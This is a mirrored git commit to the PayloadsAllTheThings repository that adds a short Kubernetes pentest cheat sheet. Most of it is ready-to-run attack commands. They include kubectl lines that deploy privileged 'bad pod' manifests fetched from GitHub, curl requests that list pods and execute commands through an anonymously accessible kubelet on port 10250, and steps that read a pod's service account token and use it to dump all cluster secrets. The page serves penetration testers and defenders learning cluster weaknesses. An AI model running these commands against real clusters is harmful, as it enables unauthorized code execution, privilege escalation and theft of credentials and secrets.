mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Kubernetes Pentest
This commit is contained in:
parent
5966c3a21b
commit
2ed3c03e78
2 changed files with 47 additions and 1 deletions
|
@ -1,4 +1,4 @@
|
|||
# Docker Pentest
|
||||
# Container - Docker Pentest
|
||||
|
||||
> Docker is a set of platform as a service (PaaS) products that uses OS-level virtualization to deliver software in packages called containers.
|
||||
|
||||
|
|
46
Methodology and Resources/Container - Kubernetes Pentest.md
Normal file
46
Methodology and Resources/Container - Kubernetes Pentest.md
Normal file
|
@ -0,0 +1,46 @@
|
|||
# Container - Kubernetes Pentest
|
||||
|
||||
> Kubernetes commonly stylized as K8s) is an open-source container orchestration system for automating software deployment, scaling, and management.
|
||||
|
||||
## Summary
|
||||
|
||||
- [Tools](#tools)
|
||||
- [Accessible kubelet on 10250/TCP](#accessible-kubelet-on-10250tcp)
|
||||
- [Obtaining Service Account Token](#obtaining-service-account-token)
|
||||
- [References](#references)
|
||||
|
||||
## Tools
|
||||
|
||||
* [BishopFox/badpods](https://github.com/BishopFox/badpods) - A collection of manifests that will create pods with elevated privileges.
|
||||
```ps1
|
||||
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml
|
||||
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml
|
||||
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv/pod/priv-exec-pod.yaml
|
||||
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpath/pod/hostpath-exec-pod.yaml
|
||||
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpid/pod/hostpid-exec-pod.yaml
|
||||
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml
|
||||
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/pod/hostipc-exec-pod.yaml
|
||||
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml
|
||||
```
|
||||
* [serain/kubelet-anon-rce](https://github.com/serain/kubelet-anon-rce)
|
||||
|
||||
## Accessible kubelet on 10250/TCP
|
||||
|
||||
Requirements:
|
||||
* `--anonymous-auth`: Enables anonymous requests to the Kubelet server
|
||||
|
||||
* Getting pods: `curl -ks https://worker:10250/pods`
|
||||
* Run commands: `curl -Gks https://worker:10250/exec/{namespace}/{pod}/{container} -d 'input=1' -d 'output=1' -d'tty=1' -d 'command=ls' -d 'command=/'`
|
||||
|
||||
## Obtaining Service Account Token
|
||||
|
||||
Token is stored at `/var/run/secrets/kubernetes.io/serviceaccount/token`
|
||||
|
||||
Use the service account token:
|
||||
* on kube-apiserver API: `curl -ks -H "Authorization: Bearer <TOKEN>" https://master:6443/api/v1/namespaces/{namespace}/secrets`
|
||||
* with kubectl: ` kubectl --insecure-skip-tls-verify=true --server="https://master:6443" --token="<TOKEN>" get secrets --all-namespaces -o json`
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Attacking Kubernetes through Kubelet - Withsecure Labs- 11 January, 2019](https://labs.withsecure.com/publications/attacking-kubernetes-through-kubelet)
|
Loading…
Reference in a new issue